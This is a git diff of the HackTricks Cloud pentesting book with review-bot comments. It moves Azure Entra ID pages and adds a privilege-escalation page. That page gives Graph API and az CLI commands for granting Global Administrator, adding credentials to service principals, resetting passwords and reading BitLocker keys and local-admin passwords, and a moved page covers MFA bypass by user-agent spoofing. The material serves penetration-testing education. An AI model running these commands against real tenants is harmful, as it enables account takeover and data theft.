diff --git a/.gitbook/assets/image (354).png b/.gitbook/assets/image (354).png new file mode 100644 index 0000000000..dcfef5337f Binary files /dev/null and b/.gitbook/assets/image (354).png differ diff --git a/.gitbook/assets/image (355).png b/.gitbook/assets/image (355).png new file mode 100644 index 0000000000..6de67ca7e0 Binary files /dev/null and b/.gitbook/assets/image (355).png differ diff --git a/.gitbook/assets/image (356).png b/.gitbook/assets/image (356).png new file mode 100644 index 0000000000..c1cfc0e35e Binary files /dev/null and b/.gitbook/assets/image (356).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 4ab2714346..e7707281d3 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -399,6 +399,7 @@ * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) + * [Az - Entra ID (formerly AzureAD - AAD)](pentesting-cloud/azure-security/az-services/az-azuread.md) * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) 
@@ -440,14 +441,14 @@ * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) * [Az - Authorization Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) + * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) + * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) + * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) - * [Az - Entra ID (formerly AzureAD - AAD)](pentesting-cloud/azure-security/az-azuread/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-azuread/dynamic-groups.md) * [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) 
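Review bot: deleting the `az-azuread/README.md`, `az-azuread/az-conditional-access-policies-mfa-bypass.md` and `az-azuread/dynamic-groups.md` entries here while moving the files to `az-services/` and `az-privilege-escalation/az-entraid-privesc/` breaks every existing link to `pentesting-cloud/azure-security/az-azuread/`; the rest of this patch only updates `azure-security/README.md` and the moved files themselves. Grep the repo for `az-azuread/` before merging to catch other pages still pointing at the old directory, and, if the book uses `.gitbook.yaml` redirects, add entries for the three old paths since they are likely linked externally.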
diff --git a/pentesting-cloud/azure-security/README.md b/pentesting-cloud/azure-security/README.md index a20f61e754..4b8dfaf467 100644 --- a/pentesting-cloud/azure-security/README.md +++ b/pentesting-cloud/azure-security/README.md @@ -88,7 +88,7 @@ After bypassing it, you might be able to get back to your initial setup and you ### Whoami {% hint style="danger" %} -Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-azuread/) section. +Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. {% endhint %} One of the first things you need to know is **who you are** (in which environment you are): @@ -144,8 +144,8 @@ You can get the same info in the **web console** going to [https://portal.azure. By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ You can find here a guide: -{% content-ref url="az-azuread/" %} -[az-azuread](az-azuread/) +{% content-ref url="az-services/az-azuread.md" %} +[az-azuread.md](az-services/az-azuread.md) {% endcontent-ref %} {% hint style="info" %} diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/pentesting-cloud/azure-security/az-basic-information/README.md index 7380bd58c3..78dd6d5511 100644 --- a/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/pentesting-cloud/azure-security/az-basic-information/README.md @@ -17,7 +17,7 @@ Learn & practice GCP Hacking:
+

https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

### Management Groups @@ -390,14 +390,6 @@ However, in some cases you might want to provide **more fined-grained access man Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ You **cannot** explicitly **deny** **access** to specific resources **using conditions**. -### Privileged Identity Management (PIM) - -Privileged Identity Management (PIM) in Azure is a tool that **manages, controls, and monitors privileged access** in Azure Active Directory and Azure. It enhances security by providing **just-in-time and time-limited privileged access**, **enforcing approval workflows, and requiring additional authentication**. This approach minimizes the risk of unauthorized access by ensuring that elevated permissions are granted only when necessary and for a specific duration. - -## - - - ## References * [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md new file mode 100644 index 0000000000..500bfae82b --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md 
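Review bot: the `### Privileged Identity Management (PIM)` section removed from `az-basic-information/README.md` in this hunk is re-added later in the patch under `az-services/az-azuread.md`, but nothing on this page now points readers there; since this is where Azure RBAC and ABAC are explained, add a content-ref to the new location right after the ABAC paragraph instead of dropping the topic silently. The text being removed also states that PIM can require additional authentication on activation, which the re-added version does not mention; carry that point over. Removing the stray empty `##` heading above `## References` is correct.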
@@ -0,0 +1,384 @@ +# Az - EntraID Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +{% hint style="info" %} +Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** +{% endhint %} + +## Roles + +### Role: Privileged Role Administrator + +This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges. + +* Assign role to a user: + +```bash +# List enabled built-in roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles" + +# Give role (Global Administrator?) to a user +roleId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" +``` + +* Add more permissions to a role: + +```bash +# List only custom roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' + +# Change the permissions of a custom role +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ + --headers "Content-Type=application/json" \ + --body '{ + "description": "Update basic properties of application registrations", + "rolePermissions": [ + { + "allowedResourceActions": [ + "microsoft.directory/applications/credentials/update" + ] + } + ] + }' +``` + +## Applications + +### `microsoft.directory/applications/credentials/update` + +This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges. 
+ +```bash +# Generate a new password without overwritting old ones +az ad app credential reset --id --append +# Generate a new certificate without overwritting old ones +az ad app credential reset --id --create-cert +``` + +### `microsoft.directory/applications.myOrganization/credentials/update` + +This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications. + +```bash +az ad app credential reset --id --append +``` + +### `microsoft.directory/applications/owners/update` + +**Description**: Update owners of applications\ +**Abuse Potential**: By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. + +```bash +az ad app owner add --id --owner-object-id +az ad app credential reset --id --append + +# You can check the owners with +az ad app owner list --id +``` + +## Service Principals + +### `microsoft.directory/servicePrincipals/credentials/update` + +This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +{% hint style="danger" %} +The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ +From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` +{% endhint %} + +If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. 
For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute: + +{% code overflow="wrap" %} +```bash +az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' +``` +{% endcode %} + +### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage` + +This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +### `microsoft.directory/servicePrincipals/owners/update` + +Similar to applications, owning a service principal allows control over its credentials and permissions. + +```bash +# Add new owner +spId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" + +az ad sp credential reset --id --append + +# You can check the owners with +az ad sp owner list --id +``` + +{% hint style="danger" %} +After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. +{% endhint %} + +### `microsoft.directory/servicePrincipals/disable` and `enable` + +These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges. + +Note that for this technique the attacker will need more permissions in order to take over the enabled service principal. 
+ +```bash +bashCopy code# Disable +az ad sp update --id --account-enabled false + +# Enable +az ad sp update --id --account-enabled true +``` + +#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials` + +These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications. + +{% code overflow="wrap" %} +```bash +# Generate SSO creds for a user or a group +spID="" +user_or_group_id="" +username="" +password="" +az rest --method POST \ + --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}" + + +# Get credentials of a specific credID +credID="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$credID\"}" +``` +{% endcode %} + +*** + +## Groups + +### `microsoft.directory/groups/allProperties/update` + +This permission allows to add users to privileged groups, leading to privilege escalation. + +```bash +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### `microsoft.directory/groups/owners/update` + +This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group. + +```bash +az ad group owner add --group --owner-object-id +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. 
+ +### `microsoft.directory/groups/members/update` + +This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access. + +```bash +az ad group member add --group --member-id +``` + +### `microsoft.directory/groups/dynamicMembershipRule/update` + +This permission allows to update membership rule in a dynamic group. An attacker could modify dynamic rules to include himself in privileged groups without explicit addition. + +```bash +groupId="" +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/groups/$groupId" \ + --headers "Content-Type=application/json" \ + --body '{ + "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")", + "membershipRuleProcessingState": "On" + }' +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### Dynamic Groups Privesc + +It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check: + +{% content-ref url="dynamic-groups.md" %} +[dynamic-groups.md](dynamic-groups.md) +{% endcontent-ref %} + +## Users + +### `microsoft.directory/users/password/update` + +This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. + +```bash +az ad user update --id --password "kweoifuh.234" +``` + +### `microsoft.directory/users/basic/update` + +This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges. + +{% code overflow="wrap" %} +```bash +#e.g. 
change manager of a user +victimUser="" +managerUser="" +az rest --method PUT \ + --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' + +#e.g. change department of a user +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ + --headers "Content-Type=application/json" \ + --body "{\"department\": \"security\"}" +``` +{% endcode %} + +## Conditional Access Policies & MFA bypass + +Misconfigured conditional access policies requiring MFA could be bypassed, check: + +{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) +{% endcontent-ref %} + +## Devices + +### `microsoft.directory/devices/registeredOwners/update` + +This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data. + +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/devices/registeredUsers/update` + +This permission allows attackers to associate their account with devices to gain access or to bypass security policies. 
+ +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/deviceLocalCredentials/password/read` + +This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password + +{% code overflow="wrap" %} +```bash +# List deviceLocalCredentials +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" + +# Get credentials +deviceLC="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ +``` +{% endcode %} + +## BitlockerKeys + +### `microsoft.directory/bitlockerKeys/key/read` + +This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality. 
+ +{% code overflow="wrap" %} +```bash +# List recovery keys +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys" + +# Get key +recoveryKeyId="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" +``` +{% endcode %} + +## Other Interesting permissions (TODO) + +* `microsoft.directory/applications/permissions/update` +* `microsoft.directory/servicePrincipals/permissions/update` +* `microsoft.directory/applications.myOrganization/allProperties/update` +* `microsoft.directory/applications/allProperties/update` +* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update` +* `microsoft.directory/applications/appRoles/update` +* `microsoft.directory/applications.myOrganization/permissions/update` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md similarity index 87% rename from pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md rename to pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index 8196bd2457..907031d6b3 100644 --- a/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,8 +1,8 @@ # Az - Conditional Access Policies & MFA Bypass {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
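Review bot: in the new `az-entraid-privesc/README.md`, the `microsoft.directory/users/basic/update` example sets the manager on the wrong object and never expands its variables: the request is `--method PUT --uri ".../users/$managerUser/manager/\$ref"` while the body is single-quoted, so `'{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'` is sent with the literal string `$managerUser`. It should target the victim, `--uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref"`, with a double-quoted body `"{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"`. The same single-quote problem affects both device examples (`devices/$deviceId/owners/\$ref` and `devices/$deviceId/registeredUsers/\$ref`), whose bodies contain `$userId` inside single quotes. Further points in this file: in `deviceLocalCredentials/password/read` the variable is declared as `deviceLC=""` but the URI uses `$deviceLCID`, and the command ends with a dangling `\`; in `getPasswordSingleSignOnCredentials` the URI is `servicePrincipals/$credID/getPasswordSingleSignOnCredentials`, but that path segment must be the service principal id (`$spID`), and the create call uses `beta` while the get call uses `v1.0`, so confirm both actions exist under the version used; the `servicePrincipals/synchronizationCredentials/manage` entry copies the description and `az ad sp credential reset --id --append` command verbatim from `servicePrincipals/credentials/update`, yet the permission concerns synchronization (provisioning) credentials rather than `passwordCredentials`, so either give the correct example or list it under the TODO section; the `servicePrincipals/disable` fence starts with the pasted artifact `bashCopy code# Disable`; `groups/members/update` lacks the "excludes Entra ID role-assignable groups" note that the other three group permissions carry, so check and make it consistent; and the hint's `az ad sp list --query ...` needs `--all`, otherwise only the first page of service principals is inspected. Typos: "elegible" (eligible), "overwritting" (overwriting), "These permissions allows" (allow), "allows attackers to assigning themselves" (to assign themselves), and "An attacker could add himself or malicious accounts to privileged groups can grant elevated access" should be rewritten as one sentence.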
@@ -50,12 +50,12 @@ The possible **results** are: Block or Grant access with potential conditions li It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block: -
+
Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\ You can change the user agent **manually** in the developer tools: -
+
Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). @@ -67,7 +67,7 @@ If this is set in the conditional policy, an attacker could just use a **VPN** i It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**: -
+
To try to bypass this protection you should see if you can **only into any application**.\ The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful. @@ -116,8 +116,8 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken Find more information about this kind of attack in the following page: -{% content-ref url="../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](../az-lateral-movement-cloud-on-prem/pass-the-prt.md) +{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} +[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md) {% endcontent-ref %} ## Tooling @@ -198,8 +198,8 @@ $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl * [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/pentesting-cloud/azure-security/az-azuread/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md similarity index 75% rename from pentesting-cloud/azure-security/az-azuread/dynamic-groups.md rename to pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md index 764e006a58..18b0e7b821 100644 --- a/pentesting-cloud/azure-security/az-azuread/dynamic-groups.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md @@ -1,8 +1,8 @@ # Az - Dynamic Groups Privesc {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -63,8 +63,8 @@ az rest --method GET \ * [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/pentesting-cloud/azure-security/az-azuread/README.md b/pentesting-cloud/azure-security/az-services/az-azuread.md similarity index 88% rename from pentesting-cloud/azure-security/az-azuread/README.md rename to pentesting-cloud/azure-security/az-services/az-azuread.md index b5bbd26da1..3f146ec5f3 100644 --- a/pentesting-cloud/azure-security/az-azuread/README.md +++ b/pentesting-cloud/azure-security/az-services/az-azuread.md @@ -21,7 +21,7 @@ Azure Active Directory (Azure AD) serves as Microsoft's cloud-based service for Key features of Azure AD involve **multi-factor authentication** and **conditional access**, alongside seamless integration with other Microsoft security services. These features significantly elevate the security of user identities and empower organizations to effectively implement and enforce their access policies. As a fundamental component of Microsoft's cloud services ecosystem, Azure AD is pivotal for the cloud-based management of user identities. -## Entities +## Enumeration ### **Connection** @@ -329,8 +329,8 @@ $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check: -{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} -[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) {% endcontent-ref %} ### Groups 
@@ -431,8 +431,8 @@ Groups can be dynamic, which basically means that **if a user fulfil certain con Check how to abuse dynamic groups in the following page: {% endhint %} -{% content-ref url="dynamic-groups.md" %} -[dynamic-groups.md](dynamic-groups.md) +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md" %} +[dynamic-groups.md](../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) {% endcontent-ref %} ### Service Principals @@ -698,7 +698,7 @@ The **owner** of the **application** can **add a password** to it (so he can imp Logins as these service principals are **not marked as risky** and they **won't have MFA.** {% endhint %} -It's possible to find a list of the App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) +It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) ### Managed Identities @@ -718,9 +718,9 @@ az identity list --output table {% endtab %} {% endtabs %} -### Roles +### Azure Roles -For more information about Azure and Entra ID roles check: +For more information about Azure roles check: {% content-ref url="../az-basic-information/" %} [az-basic-information](../az-basic-information/) 
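Review bot: in the Service Principals hunk the edited sentence reads "a list of commonly used App IDs that belongs to Microsoft"; it should be "that belong to Microsoft". Renaming `### Roles` to `### Azure Roles` is fine given that the Entra ID material is split out below, but make the intro sentence explicit that this section covers Azure RBAC only.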
@@ -747,23 +747,6 @@ az role assignment list --all --query "[].{principalName:principalName,principal ``` {% endtab %} -{% tab title="Azure AD" %} -```powershell -# Get all available role templates -Get-AzureADDirectoryroleTemplate -# Get enabled roles (Assigned roles) -Get-AzureADDirectoryRole -Get-AzureADDirectoryRole -ObjectId #Get info about the role -# Get custom roles - use AzureAdPreview -Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName -# Users assigned a role (Global Administrator) -Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember -Get-AzureADDirectoryRole -ObjectId | fl -# Roles of the Administrative Unit (who has permissions over the administrative unit and its members) -Get-AzureADMSScopedRoleMembership -Id | fl * -``` -{% endtab %} - {% tab title="Az PowerShell" %} ```powershell # Get role assignments on the subscription 
